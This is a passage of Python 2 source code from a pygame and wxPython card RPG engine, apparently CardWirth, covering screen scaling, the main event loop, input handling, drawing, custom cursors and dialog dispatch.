d["compatibility"] = self.sct.to_basehint(versionhint)
if with_datetime:
date = datetime.datetime.today()
d["date"] = date.strftime("%Y-%m-%d")
d["year"] = date.strftime("%Y")
d["month"] = date.strftime("%m")
d["day"] = date.strftime("%d")
d["time"] = date.strftime("%H:%M:%S")
d["hour"] = date.strftime("%H")
d["minute"] = date.strftime("%M")
d["second"] = date.strftime("%S")
d["millisecond"] = date.strftime("%f")[:3]
if for_fname:
d2 = {}
for key, value in d.iteritems():
value = value.replace(" ", "_")
value = value.replace(":", ".")
d2[key] = cw.binary.util.check_filename(value).strip()
return (d, d2)
else:
return d
def update_scale(self, scale, changearea=True, rsrconly=False, udpatedrawsize=True,
displaysize=None, afterfunc=None):
"""画面の表示倍率を変更する。
scale: 倍率。1は拡大しない。2で縦横2倍サイズの表示になる。
"""
fullscreen = self.is_expanded() and self.setting.expandmode == "FullScreen"
if displaysize is None and fullscreen:
def func():
dsize = self.frame.get_displaysize()
def func():
self.update_scale(scale, changearea, rsrconly, udpatedrawsize, dsize)
if afterfunc:
afterfunc()
self.exec_func(func)
self.frame.exec_func(func)
return
self.update_scaling = True
if self.ydata:
changed = self.ydata.is_changed()
else:
changed = False
resizewin = False
if not rsrconly:
cw.UP_SCR = scale
flags = 0
if fullscreen:
dsize = displaysize
self.scr_fullscreen = pygame.display.set_mode((dsize[0], dsize[1]), flags)
self.scr = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
self.scr_draw = self.scr
else:
self.scr_fullscreen = None
self.scr = pygame.display.set_mode(cw.wins(cw.SIZE_GAME), flags)
if cw.UP_SCR == cw.UP_WIN:
self.scr_draw = self.scr
else:
self.scr_draw = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
resizewin = True
if udpatedrawsize:
self._init_resources()
self.statusbar.update_scale()
self.sbargrp.set_clip(self.statusbar.rect)
if self.sdata:
self.sdata.update_scale()
if self.pre_mcards:
mcarddata = self.sdata.get_mcarddata(self.pre_areaids[-1][0], self.pre_areaids[-1][1])
self.pre_mcards[-1] = self.set_mcards(mcarddata, False, False)
self._update_clip()
cw.sprite.message.MessageWindow.clear_selections()
for sprite in self.cardgrp.sprites():
if sprite.is_initialized() and not isinstance(sprite, (cw.sprite.background.BackGround,
cw.sprite.background.BgCell))\
and not isinstance(sprite, cw.sprite.background.Curtain):
sprite.update_scale()
for sprite in self.topgrp.sprites():
sprite.update_scale()
for sprite in self.backloggrp.sprites():
sprite.update_scale()
for sprite in self.get_fcards():
sprite.update_scale()
for sprite in self.cardgrp.sprites():
if sprite.is_initialized() and isinstance(sprite, (cw.sprite.background.BackGround,
cw.sprite.background.BgCell))\
and not isinstance(sprite, cw.sprite.background.Curtain):
sprite.update_scale()
for sprite in self.cardgrp.sprites():
if isinstance(sprite, cw.sprite.background.Curtain) and\
isinstance(sprite.target, cw.sprite.card.CWPyCard):
sprite.update_scale()
self._update_clip()
for music in self.music:
music.update_scale()
else:
self.init_fullscreenparams()
self.update_fullscreenbackground()
cw.cwpy.frame.exec_func(self.rsrc.update_winscale)
if self.ydata:
self.ydata._changed = changed
self.clear_selection()
self.mousepos = (-1, -1)
if not self.is_showingdlg():
            # Unless the mouse pointer is moved off-screen once,
            # focus may be lost
pos = pygame.mouse.get_pos()
pygame.mouse.set_pos([-1, -1])
pygame.mouse.set_pos(pos)
self.change_cursor(self.cursor, force=True)
self.update_scaling = False
if udpatedrawsize and not self.background.reload_jpdcimage and self.background.has_jpdcimage:
self.background.reload(False, ttype=(None, None))
if afterfunc:
afterfunc()
if changearea:
def func():
self.update()
self.draw()
self.exec_func(func)
if not rsrconly and not (self.setting.expandmode == "FullScreen" and self.is_expanded()):
def func():
self.set_clientsize(cw.wins(cw.SIZE_GAME))
self.exec_func(func)
def update_messagestyle(self):
"""メッセージの描画形式の変更を反映する。"""
cw.sprite.message.MessageWindow.clear_selections()
for sprite in itertools.chain(self.cardgrp.get_sprites_from_layer(cw.LAYER_MESSAGE),
self.cardgrp.get_sprites_from_layer(cw.LAYER_SPMESSAGE)):
sprite.update_scale()
if self._log_handler:
self._log_handler.update_sprites(clearcache=True)
def update_vocation120(self, vocation120):
"""適性表示を1.20に合わせる設定を変更する。"""
if self.setting.vocation120 <> vocation120:
self.setting.vocation120 = vocation120
for sprite in self.cardgrp.sprites():
if isinstance(sprite, cw.sprite.background.InuseCardImage) or\
(isinstance(sprite, cw.character.Character) and sprite.is_initialized() and sprite.test_aptitude):
sprite.update_scale()
def update_curtainstyle(self):
"""カーテンの描画形式の変更を反映する。"""
for sprite in itertools.chain(self.cardgrp.sprites(),
self.backloggrp.sprites(),
self.sbargrp.sprites()):
if isinstance(sprite, cw.sprite.message.BacklogCurtain):
sprite.color = self.setting.blcurtaincolour
sprite.update_scale()
elif isinstance(sprite, cw.sprite.background.Curtain):
sprite.color = self.setting.curtaincolour
sprite.update_scale()
def set_debug(self, debug):
self.setting.debug = debug
self.setting.debug_saved = debug
self.debug = debug
self.statusbar.change(not self.is_runningevent())
if self.is_battlestatus():
if self.battle:
self.battle.update_debug()
else:
for sprite in self.get_mcards():
sprite.update_scale()
if not debug and self.is_showingdebugger():
self.frame.exec_func(self.frame.debugger.Close)
if not self.is_decompressing:
cw.data.redraw_cards(debug)
self.clear_selection()
self.draw()
def update_infocard(self):
"""デバッガ等から所有情報カードの変更を
行った際に呼び出される。
"""
self.sdata.notice_infoview = True
showbuttons = not self.is_playingscenario() or\
(not self.areaid in cw.AREAS_TRADE and self.areaid in cw.AREAS_SP)
if self.is_battlestatus() and not self.battle.is_ready():
showbuttons = False
self.statusbar.change(showbuttons)
if self.areaid == cw.AREA_CAMP and self.is_playingscenario():
cw.data.redraw_cards(cw.cwpy.sdata.has_infocards())
def run(self):
try:
try:
self._run()
except CWPyRunningError:
self.quit()
except wx.PyDeadObjectError:
pass
self._quit()
except:
self.is_processing = False
self._running = False
if self.advlog:
self.advlog.enable(False)
            # Write the error log
exc_type, exc_value, exc_traceback = sys.exc_info()
vstr = []
for v in cw.APP_VERSION:
vstr.append(str(v))
sys.stderr.write("Version : %s" % ".".join(vstr))
if versioninfo:
sys.stderr.write(" / %s" % (versioninfo.build_datetime))
sys.stderr.write("\n")
d = datetime.datetime.today()
sys.stderr.write(d.strftime("DateTime: %Y-%m-%d %H:%M:%S\n"))
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr)
sys.stderr.write("\n")
finally:
cw.util.clear_mutex()
def _run(self):
self._running = True
while self._running:
self.main_loop(True)
def main_loop(self, update):
        if pygame.event.peek(USEREVENT):
            self.input()  # fetch input events
            self.eventhandler.run()  # consume events
        else:
            self.tick_clock()  # FPS adjustment
            self.input()  # fetch input events
            self.eventhandler.run()  # event handler
        if not pygame.event.peek(USEREVENT):
            if update:
                self.update()  # update sprites
                self.draw(True)  # draw sprites
if not self.is_runningevent() and self._clear_changed:
if self.ydata:
self.ydata._changed = False
self._clear_changed = False
def quit(self):
        # Close via the top frame and exit. See cw.frame.OnDestroy.
event = wx.PyCommandEvent(wx.wxEVT_DESTROY)
self.frame.AddPendingEvent(event)
def quit2(self):
self.ydata = None
event = wx.PyCommandEvent(wx.wxEVT_CLOSE_WINDOW)
self.frame.AddPendingEvent(event)
def _quit(self):
self.advlog.end_scenario(False, False)
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.lastsound_system:
self.lastsound_system.stop(False)
self.lastsound_system = None
pygame.quit()
cw.util.remove_temp()
self._save_breakpoints()
self.setting.write()
if self.rsrc:
self.rsrc.clear_systemfonttable()
def tick_clock(self, framerate=0):
if framerate:
self.clock.tick(framerate)
else:
self.clock.tick(self.setting.fps)
def wait_frame(self, count, canskip):
"""countフレーム分待機する。"""
self.event.eventtimer = 0
skip = False
for _i in xrange(count):
if canskip:
                # Abort on a long press of Return, a mouse button up, or a key down
if self.keyevent.is_keyin(pygame.locals.K_RETURN) or self.keyevent.is_mousein():
skip = True
break
sel = self.selection
self.sbargrp.update(cw.cwpy.scr_draw)
            if sel != self.selection:
cw.cwpy.draw(clip=self.statusbar.rect)
breakflag = self.get_breakflag(handle_wheel=cw.cwpy.setting.can_skipwait_with_wheel)
self.input(inputonly=True)
self.eventhandler.run()
if breakflag:
skip = True
break
self.tick_clock()
return skip
def get_breakflag(self, handle_wheel=True):
"""待機時間を飛ばすべき入力がある場合にTrueを返す。"""
if self.is_playingscenario() and self.sdata.in_f9:
return True
breakflag = False
self.keyevent.peek_mousestate()
events = pygame.event.get((pygame.locals.MOUSEBUTTONUP, pygame.locals.KEYUP))
for e in events:
if e.type in (pygame.locals.MOUSEBUTTONUP, pygame.locals.MOUSEBUTTONDOWN) and hasattr(e, "button"):
if not handle_wheel and e.button in (4, 5):
                    # Setting that disables skipping idle time with the mouse wheel
                    continue
breakflag = True
elif e.type == pygame.locals.KEYUP:
if not e.key in (pygame.locals.K_F1, pygame.locals.K_F2, pygame.locals.K_F3, pygame.locals.K_F4,
pygame.locals.K_F5, pygame.locals.K_F6, pygame.locals.K_F7, pygame.locals.K_F8,
pygame.locals.K_F9, pygame.locals.K_F10, pygame.locals.K_F11, pygame.locals.K_F12,
pygame.locals.K_F13, pygame.locals.K_F14, pygame.locals.K_F15):
breakflag = True
cw.thread.post_pygameevent(e)
return breakflag
def get_nextevent(self):
        # BUG: a MOUSEBUTTONUP without a `button` attribute apparently occurs
        # on rare occasions (possibly environment dependent). Therefore, check
        # here for mouse events without `button` or key events without `key`,
        # and ignore such events.
while True:
if self.events:
e = self.events[0]
self.events = self.events[1:]
# ---
if e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP) and not hasattr(e, "button"):
continue
elif e.type in (KEYDOWN, KEYUP) and not hasattr(e, "key"):
continue
                elif e.type != USEREVENT and self.is_showingdlg():
continue
# ---
return e
else:
return None
def clear_inputevents(self):
self.keyevent.peek_mousestate()
pygame.event.clear((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
events = []
for e in self.events:
if not e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
events.append(e)
self.events = events
def input(self, eventclear=False, inputonly=False, noinput=False):
if eventclear:
self.clear_inputevents()
return
self.keyevent.peek_mousestate()
self.proc_animation()
if not self.is_showingdlg():
if sys.platform == "win32":
self.mousein = pygame.mouse.get_pressed()
mousepos = self.mousepos
if self.update_mousepos():
                # Detect cursor movement
                mousemotion2 = self.mousepos != mousepos
                if self.wheelmode_cursorpos != (-1, -1) and self.mousepos != (-1, -1) and mousepos != (-1, -1):
                    # While the selection is being changed with the arrow keys or the wheel,
                    # ignore slight mouse jitter (detected as a radius from the original position)
ax, ay = self.wheelmode_cursorpos
bx, by = self.mousepos
self.mousemotion = self.setting.radius_notdetectmovement < abs(math.hypot(ax-bx, ay-by))
if self.mousemotion:
self.wheelmode_cursorpos = (-1, -1)
else:
self.mousemotion = mousemotion2
self.wheelmode_cursorpos = (-1, -1)
if self.mousemotion:
for i in xrange(len(self.keyevent.mousein)):
if not self.keyevent.mousein[i] in (0, -1):
                            # If the mouse pointer moved, postpone the delay before auto-repeat starts
                            # (-1 means auto-repeat is already active)
self.keyevent.mousein[i] = pygame.time.get_ticks()
if self.setting.show_allselectedcards and not self.is_runningevent() and self.is_battlestatus() and self.battle.is_ready():
                    # Clear the battle action display when the mouse cursor moves above the party area
                    if mousemotion2 and self._in_partyarea(mousepos) != self._in_partyarea(self.mousepos):
self._show_allselectedcards = True
self.change_selection(self.selection)
self.draw()
self.keyin = self.keyevent.get_pressed()
if inputonly:
seq = []
for e in self.events:
if e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
seq.append(e)
else:
cw.thread.post_pygameevent(e)
events = pygame.event.get((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
if events:
events = [events[-1]]
seq.extend(events)
del self.events[:]
self.events.extend(seq)
else:
if noinput:
seq = []
for e in self.events:
if not e.type in (MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP):
seq.append(e)
del self.events[:]
self.events.extend(seq)
pygame.event.clear((MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP))
self.events.extend(pygame.event.get())
def _in_partyarea(self, mousepos):
return cw.s(290-5) <= mousepos[1] and mousepos[1] < cw.s(cw.SIZE_AREA[1])
def update_mousepos(self):
if pygame.mouse.get_focused():
if self.scr_fullscreen:
mousepos = pygame.mouse.get_pos()
x = int((mousepos[0] - self.scr_pos[0]) / self.scr_scale)
y = int((mousepos[1] - self.scr_pos[1]) / self.scr_scale)
self.mousepos = (x, y)
else:
self.mousepos = cw.mwin2scr_s(pygame.mouse.get_pos())
else:
self.mousepos = (-1, -1)
return True
def update(self):
if not self.statusbar:
return
assert not self.event.in_cardeffectmotion
# 状態の補正
if not self.statusbar.showbuttons:
# 通常エリアで操作可能な状態であればステータスバーのボタンを表示
if not self.is_runningevent() and not self.areaid in cw.AREAS_TRADE and not self.selectedheader:
self.statusbar.change()
self.draw()
if self.lock_menucards:
# 操作可能であればメニューカードのロックを解除
if not self.is_runningevent() and not self.is_showingdlg():
self.lock_menucards = False
cw.cwpy.frame.check_killlist()
# 一時カードはダイアログを開き直す直前に荷物袋へ戻すが、
# 戦闘突入等でダイアログを開き直せなかった場合はここで戻す
self.return_takenoutcard()
# JPDC撮影などで更新されたメニューカードと背景を更新する
self.fix_updated_file()
# パーティが非表示であれば表示する
if not self.is_runningevent():
if not self.is_showparty:
self.show_party()
if not cw.cwpy.sdata.infocards_beforeevent is None:
for _i in filter(lambda i: not i in cw.cwpy.sdata.infocards_beforeevent,
cw.cwpy.sdata.get_infocards(False)):
# An information card not held before the event started has been obtained
cw.cwpy.sdata.notice_infoview = True
cw.cwpy.statusbar.change()
break
cw.cwpy.sdata.infocards_beforeevent = None
if self._need_disposition:
self.disposition_pcards()
self.draw()
self.update_groups()
def update_groups(self):
self.cardgrp.update(self.scr_draw)
self.topgrp.update(self.scr_draw)
self.sbargrp.update(self.scr_draw)
def return_takenoutcard(self, checkevent=True):
# Return cards temporarily taken out of the backpack (unless they have vanished)
if self.card_takenouttemporarily and not self.selectedheader and (not checkevent or not self.is_runningevent()) and not self.is_battlestatus():
owner = self.card_takenouttemporarily.get_owner()
if owner and isinstance(owner, cw.character.Character) and self.sdata.party_environment_backpack:
self.clear_inusecardimg(self.card_takenouttemporarily.get_owner())
cw.cwpy.trade("BACKPACK", header=self.card_takenouttemporarily, from_event=False, parentdialog=None, sound=False, call_predlg=False, sort=True)
cw.cwpy.card_takenouttemporarily = None
def fix_updated_file(self, force=False):
# Refresh menu cards and the background updated by JPDC shooting etc.
if not force and (not self.is_playingscenario() or self.is_runningevent()):
return
if self.sdata.ex_cache:
if self.background.use_excache:
self.background.use_excache = False
self.file_updates_bg = True
for mcard in self.get_mcards():
if mcard.is_initialized() and mcard.cardimg.use_excache:
self.file_updates.add(mcard)
mcard.cardimg.use_excache = False
for path in self.sdata.ex_cache.keys():
path = os.path.normcase(os.path.normpath(os.path.abspath(path)))
self.sdata.resource_cache.clear()
self.sdata.resource_cache_size = 0
self.sdata.ex_cache.clear()
if self.background.pc_cache:
self.background.pc_cache.clear()
if self.is_curtained():
self.background.reload_jpdcimage = True
else:
if self.file_updates_bg:
self.background.reload(False)
self.file_updates_bg = False
elif not self.background.reload_jpdcimage and self.background.has_jpdcimage:
self.background.reload(False, ttype=(None, None))
self.background.reload_jpdcimage = True
if self.file_updates:
for mcard in self.get_mcards("visible"):
if mcard in self.file_updates:
cw.animation.animate_sprite(mcard, "hide")
mcard.cardimg.fix_pcimage_updated()
mcard.cardimg.clear_cache()
mcard.update_image()
cw.animation.animate_sprite(mcard, "deal")
self.file_updates.clear()
def proc_animation(self):
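"""Advance every registered animation sprite at 60 frames per
second, redrawing only the affected rectangles; finished or
aborted sprites are removed via stop_animation()."""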
removes = set()
for sprite in self.animations:
if sprite.status != sprite.anitype:
removes.add(sprite)
continue # animation finished
clip = pygame.Rect(sprite.rect)
ticks = pygame.time.get_ticks()
if ticks < sprite.start_animation:
sprite.start_animation = ticks
frame = int((ticks - sprite.start_animation) / 1000.0 * 60.0)
if frame <= sprite.frame:
continue # no frame advance
sprite.frame = frame
method = getattr(sprite, "update_" + sprite.status, None)
if method:
method()
else:
removes.add(sprite)
continue # animation aborted
clip.union_ip(sprite.rect)
self.draw(clip=clip)
if sprite.status != sprite.anitype:
removes.add(sprite) # animation finished
for sprite in removes:
self.stop_animation(sprite)
def stop_animation(self, sprite):
if sprite in self.animations:
sprite.anitype = ""
sprite.start_animation = 0
sprite.frame = 0
self.animations.remove(sprite)
def draw_to(self, scr, draw_desc):
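"""Draw all sprite groups (and any playing movie frame) onto scr
and return the accumulated list of dirty rectangles."""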
dirty_rects = cw.sprite.background.layered_draw_ex(self.cardgrp, scr)
dirty_rects.extend(self.topgrp.draw(scr))
dirty_rects.extend(self.backloggrp.draw(scr))
for music in self.music:
if music.movie_scr:
scr.blit(music.movie_scr, (0, 0))
clip2 = scr.get_clip()
scr.set_clip(None)
dirty_rects.extend(self.statusbar.layered_draw_ex(self.sbargrp, scr, draw_desc))
scr.set_clip(clip2)
return dirty_rects
def lazy_draw(self):
if self._lazy_draw:
self.draw()
def set_lazydraw(self):
self._lazy_draw = True
def add_lazydraw(self, clip):
if self._lazy_clip:
self._lazy_clip.union_ip(clip)
else:
self._lazy_clip = pygame.Rect(clip)
def draw(self, mainloop=False, clip=None):
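"""Render one frame, scaling up for fullscreen or an expanded
window as needed.
mainloop: True when called from the main loop; drawing is skipped
unless an input event occurred.
clip: optional pygame.Rect limiting the redrawn region."""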
if not clip:
self._lazy_draw = False
if self.has_inputevent or not mainloop:
# Draw the sprite groups
# FIXME: when the drawing region is narrowed, the next background
# sometimes shows through while a card is being drawn
if clip:
if self._lazy_clip:
clip = self._lazy_clip.union_ip(clip)
# PyLite: this position changed when local variables were implemented
self.scr_draw.set_clip(clip)
self.cardgrp.set_clip(clip)
self.topgrp.set_clip(clip)
self.backloggrp.set_clip(clip)
self.sbargrp.set_clip(clip)
self._lazy_clip = None
dirty_rects = self.draw_to(self.scr_draw, True)
if not self.setting.smoothexpand or cw.UP_SCR % cw.UP_WIN == 0 or cw.UP_WIN % cw.UP_SCR == 0:
scale = pygame.transform.scale
else:
scale = cw.image.smoothscale
def update_clip(scale):
clx = int(clip.left * scale) - 2
cly = int(clip.top * scale) - 2
clw = int(clip.width * scale) + 5
clh = int(clip.height * scale) + 5
return pygame.Rect(clx, cly, clw, clh)
# Update the screen
if self.scr_fullscreen:
scr = scale(self.scr_draw, self.scr_size)
if clip:
clip2 = update_clip(self.scr_scale)
clip3 = pygame.Rect(clip2.left + self.scr_pos[0], clip2.top + self.scr_pos[1], clip2.width, clip2.height)
self.scr_fullscreen.blit(scr, clip3.topleft, clip2)
pygame.display.update(clip3)
else:
self.scr_fullscreen.blit(scr, self.scr_pos)
pygame.display.update()
elif self.scr_draw != self.scr:
scr = scale(self.scr_draw, self.scr.get_size())
if clip:
clip2 = update_clip(float(cw.UP_WIN) / cw.UP_SCR)
self.scr.blit(scr, clip2.topleft, clip2)
pygame.display.update(clip2)
else:
self.scr.blit(scr, (0, 0))
pygame.display.update()
else:
if clip:
pygame.display.update(clip)
else:
pygame.display.update(dirty_rects)
pos = cw.s((0, 0))
size = cw.s(cw.SIZE_AREA)
self.scr_draw.set_clip(pygame.Rect(pos, size))
self._update_clip()
size = cw.s(cw.SIZE_GAME)
self.sbargrp.set_clip(pygame.Rect(pos, size))
self.event.eventtimer = 0
def init_fullscreenparams(self):
"""フルスクリーン表示用のパラメータを計算する。"""
if self.scr_fullscreen:
fsize = self.scr_fullscreen.get_size()
ssize = cw.s(cw.SIZE_GAME)
a = float(fsize[0]) / ssize[0]
b = float(fsize[1]) / ssize[1]
scale = min(a, b)
size = (int(ssize[0] * scale), int(ssize[1] * scale))
x = (fsize[0] - size[0]) / 2
y = (fsize[1] - size[1]) / 2
self.scr_size = size
self.scr_scale = scale
self.scr_pos = (x, y)
ssize = cw.SIZE_GAME
a = float(fsize[0]) / ssize[0]
b = float(fsize[1]) / ssize[1]
scale = min(a, b)
# FIXME: the scenario selection dialog becomes taller than the
# screen resolution, so make the scale slightly smaller
cw.UP_WIN = scale * 0.9
cw.UP_WIN_M = scale
else:
self.scr_size = self.scr.get_size()
self.scr_scale = 1.0
self.scr_pos = (0, 0)
def update_fullscreenbackground(self):
if self.scr_fullscreen:
# Wallpaper
if self.setting.fullscreenbackgroundtype == 0:
self.scr_fullscreen.fill((0, 0, 0))
fname = u""
elif self.setting.fullscreenbackgroundtype == 1:
self.scr_fullscreen.fill((255, 255, 255))
fname = self.setting.fullscreenbackgroundfile
elif self.setting.fullscreenbackgroundtype == 2:
self.scr_fullscreen.fill((255, 255, 255))
fname = self.setting.fullscreenbackgroundfile
fname = cw.util.find_resource(cw.util.join_paths(self.skindir, fname), self.rsrc.ext_img)
if fname:
back = cw.util.load_image(fname, can_loaded_scaledimage=True)
if back.get_width():
if self.setting.fullscreenbackgroundtype == 2:
back = cw.wins(back)
padsize = back.get_size()
fsize = self.scr_fullscreen.get_size()
for x in xrange(0, fsize[0], padsize[0]):
for y in xrange(0, fsize[1], padsize[1]):
self.scr_fullscreen.blit(back, (x, y))
width = 16
x = self.scr_pos[0] - width/2-1
y = self.scr_pos[1] - width/2-1
w = self.scr_size[0] + width+1
h = self.scr_size[1] + width+1
sur = pygame.Surface((w, h)).convert_alpha()
sur.fill((255, 255, 255, 192))
self.scr_fullscreen.blit(sur, (x, y))
def change_cursor(self, name="arrow", force=False):
"""マウスカーソルを変更する。
name: 変更するマウスカーソルの名前。
(arrow, diamond, broken_x, tri_left, tri_right, mouse)"""
if not force and self.cursor == name:
return
self.cursor = name
if isinstance(self.selection, cw.sprite.statusbar.StatusBarButton):
name = "arrow"
if name == "arrow":
if 2 <= cw.dpi_level:
# 48x48
s = (
"### ",
"#### ",
"##.## ",
"##..## ",
"##...## ",
"##....## ",
"##.....## ",
"##......## ",
"##.......## ",
"##........## ",
"##.........## ",
"##..........## ",
"##...........## ",
"##............## ",
"##.............## ",
"##..............## ",
"##...............## ",
"##................## ",
"##.................## ",
"##..................## ",
"##...................## ",
"##....................## ",
"##...........############ ",
"##...........############# ",
"##.......##...## ",
"##......###...## ",
"##.....#####...## ",
"##....### ##...## ",
"##...### ##...## ",
"##..### ##...## ",
"##.### ##...## ",
"##### ##...## ",
"#### ##...## ",
"### ##...## ",
"## ##...## ",
" ##..### ",
" ##### ",
" ### ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",
" ",)
else:
# 24x24
s = (
" ",
"## ",
"#.# ",
"#..# ",
"#...# ",
"#....# ",
"#.....# ",
"#......# ",
"#.......# ",
"#........# ",
"#.........# ",
"#..........# ",
"#......##### ",
"#...#..# ",
"#..# #..# ",
"#.# #..# ",
"## #..# ",
" #..# ",
" ### ",
" ",
" ",
" ",
" ",
" ",)
if self.setting.cursor_type == cw.setting.CURSOR_WHITE:
cursor = pygame.cursors.compile(s, "#", ".", "o")
else:
cursor = pygame.cursors.compile(s, ".", "#", "o")
pygame.mouse.set_cursor((len(s[0]), len(s)), (0, 0), *cursor)
#pygame.mouse.set_cursor(*pygame.cursors.arrow)
#pygame.mouse.set_visible(False) # PyLite: hide the cursor
elif name == "diamond":
pygame.mouse.set_cursor(*pygame.cursors.diamond)
elif name == "broken_x":
pygame.mouse.set_cursor(*pygame.cursors.broken_x)
elif name == "tri_left":
pygame.mouse.set_cursor(*pygame.cursors.tri_left)
elif name == "tri_right":
pygame.mouse.set_cursor(*pygame.cursors.tri_right)
elif name == "mouse":
if 2 <= cw.dpi_level:
# 48x48
s = (
" ##..## #################### ",
" ##..## #################### ",
" ##..## ##................## ",
" ##..## ##................## ",
" ##..## ##........##......## ",
" ##..## ##.......###......## ",
" ################.....###.......## ",
" ####################...##........## ",
" ####......##......####............## ",
" ###........##........###...........## ",
" ##.........##.........##...#####...## ",
"###.........##.........###..#####...## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..#####...## ",
"##..........##..........##..#####...## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##..........##..........##..........## ",
"##########################..........## ",
"############..############..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................##..........## ",
"##......................############## ",
"##......................############## ",
"##......................## ",
"##......................## ",
"###....................### ",
" ##....................## ",
" ###..................### ",
" ###................### ",
" ################### ###### #### ##### ",
" #################### ############ ###### ",
" ##.....###..## ##..####.....###..# ##..## ",
" ##.......##..## ##..###.......##..###..## ",
"##...#######..## ##..##...#######..##..## ",
"##..########..## ##..##..########.....## ",
"##..########..######..##..########..##..## ",
"##...#######..######..##...#######..###..## ",
" ##.......##......##..###.......##..# ##..## ",
" ##.....###......##..####.....###..# ##..## ",
" #################### ############ ##### ",
" ###### ############ ###### #### #### ",)
point = (14, 14)
else:
# 24x24
s = (
" #.# ########## ",
" #.# #........# ",
" #.# #....#...# ",
" #########..#....# ",
" #....#....#......# ",
"#.....#.....#.##..# ",
"#.....#.....#.....# ",
"#.....#.....#.##..# ",
"#.....#.....#.....# ",
"#.....#.....#.....# ",
"######.######.....# ",
"#...........#.....# ",
"#...........#.....# ",
"#...........#.....# ",
"#...........####### ",
"#...........# ",
"#...........# ",
" #.........# ",
" ########## ### # # ",
" #...#.# #.##...#.##.# ",
"#.####.# #.#.####...# ",
"#.####.###.#.####.#.# ",
" #...#...#.##...#.##.# ",
" ######### ### # # ",)
point = (7, 7)
if self.setting.cursor_type == cw.setting.CURSOR_WHITE:
cursor = pygame.cursors.compile(s, "#", ".", "o")
else:
cursor = pygame.cursors.compile(s, ".", "#", "o")
pygame.mouse.set_cursor((len(s[0]), len(s)), point, *cursor)
if not force:
# FIXME: the change does not take effect until the mouse pointer moves once
pos = pygame.mouse.get_pos()
x = pos[0] - 1 if 0 < pos[0] else pos[0] + 1
y = pos[1] - 1 if 0 < pos[1] else pos[1] + 1
pygame.mouse.set_pos(x, y)
pygame.mouse.set_pos(pos)
def call_dlg(self, name, **kwargs):
"""ダイアログを開く。
name: ダイアログ名。cw.frame参照。
"""
if name not in self.frame.dlgeventtypes:
cw.cwpy.call_dlg("ERROR", text=u"ダイアログ「%s」は存在しません。" % name)
return
stack = self._showingdlg
self.lock_menucards = True
self.input(eventclear=True)
self._showingdlg += 1
self.statusbar.clear_volumebar()
if isinstance(self.selection, cw.sprite.statusbar.StatusBarButton):
# The display can become corrupted, so remove focus
# from the status bar button beforehand
self.mousepos = (-1, -1)
self.keyevent.clear() # reset key input
event = wx.PyCommandEvent(self.frame.dlgeventtypes[name])
event.args = kwargs
if threading.currentThread() == self:
self.draw()
def func():
# BUG: after opening the scenario installation dialog,
# filter events start to misbehave
# self.frame.app.SetCallFilterEvent(True)
pass
#self.frame.exec_func(func)
self.frame.AddPendingEvent(event)
if sys.platform == "win32":
while self.is_running() and self.frame.IsEnabled() and stack < self._showingdlg:
pass
else:
#self.frame.app.SetCallFilterEvent(True)
self.frame.ProcessEvent(event)
def call_modaldlg(self, name, **kwargs):
"""ダイアログを開き、閉じるまで待機する。
name: ダイアログ名。cw.frame参照。
"""
stack = self._showingdlg
self.call_dlg(name, **kwargs)
if threading.currentThread() == self:
while self.is_running() and stack < self._showingdlg:
self.main_loop(False)
def call_predlg(self):
"""直前に開いていたダイアログを再び開く。"""
self.return_takenoutcard(checkevent=False)
if self.pre_dialogs:
pre_info = self.pre_dialogs[-1]
callname = pre_info[0]
if 0 <= self.areaid and self.is_playingscenario() and callname in ("CARDPOCKET", "CARDPOCKETB"):
# Do not reopen after a game over
if cw.cwpy.is_gameover():
self.pre_dialogs.pop()
return
# Do not reopen if the selected owner of the hand-card dialog
# is incapacitated or has been removed from play
index2 = pre_info[1]
if isinstance(index2, cw.character.Character) and\
(index2.is_vanished() or ((not index2.is_active() and not self.areaid in cw.AREAS_TRADE))):
self.pre_dialogs.pop()
self.lock_menucards = False
return
self.call_modaldlg(callname)
else:
self.lock_menucards = False
def kill_showingdlg(self):
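"""Note one dialog as closed; when the last dialog closes and no
event is running, schedule clearing of the current selection."""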
self._showingdlg -= 1
if self._showingdlg <= 0:
# BUG: related to the scenario installation dialog
# self.frame.app.SetCallFilterEvent(False)
if not self.is_runningevent():
self.exec_func(self.clear_selection)
def exec_func(self, func, *args, **kwargs):
"""CWPyスレッドで指定したファンクションを実行する。
func: 実行したいファンクションオブジェクト。
"""
event = pygame.event.Event(pygame.USEREVENT, func=func, args=args,
kwargs=kwargs)
post_pygameevent(event)
def sync_exec(self, func, *args, **kwargs):
"""CWPyスレッドで指定したファンクションを実行し、
終了を待ち合わせる。ファンクションの戻り値を返す。
func: 実行したいファンクションオブジェクト。
"""
if threading.currentThread() == self:
return func(*args, **kwargs)
else:
result = [None]
class Running(object):
def __init__(self):
self.isrun = True
running = Running()
def func2(running, result, func, *args, **kwargs):
result[0] = func(*args, **kwargs)
running.isrun = False
self.exec_func(func2, running, result, func, *args, **kwargs)
while running.isrun and self.frame.IsEnabled() and self.is_running():
time.sleep(0.001)
return result[0]
def set_expanded(self, flag, expandmode="", force=False, displaysize=None):
"""拡大表示する。すでに拡大表示されている場合は解除する。
flag: Trueなら拡大表示、Falseなら解除。
"""
if not force and self.is_expanded() == flag:
return
if not expandmode:
expandmode = self.expand_mode if self.is_expanded() else self.setting.expandmode
if displaysize is None and expandmode == "FullScreen" and flag:
def func():
dsize = self.frame.get_displaysize()
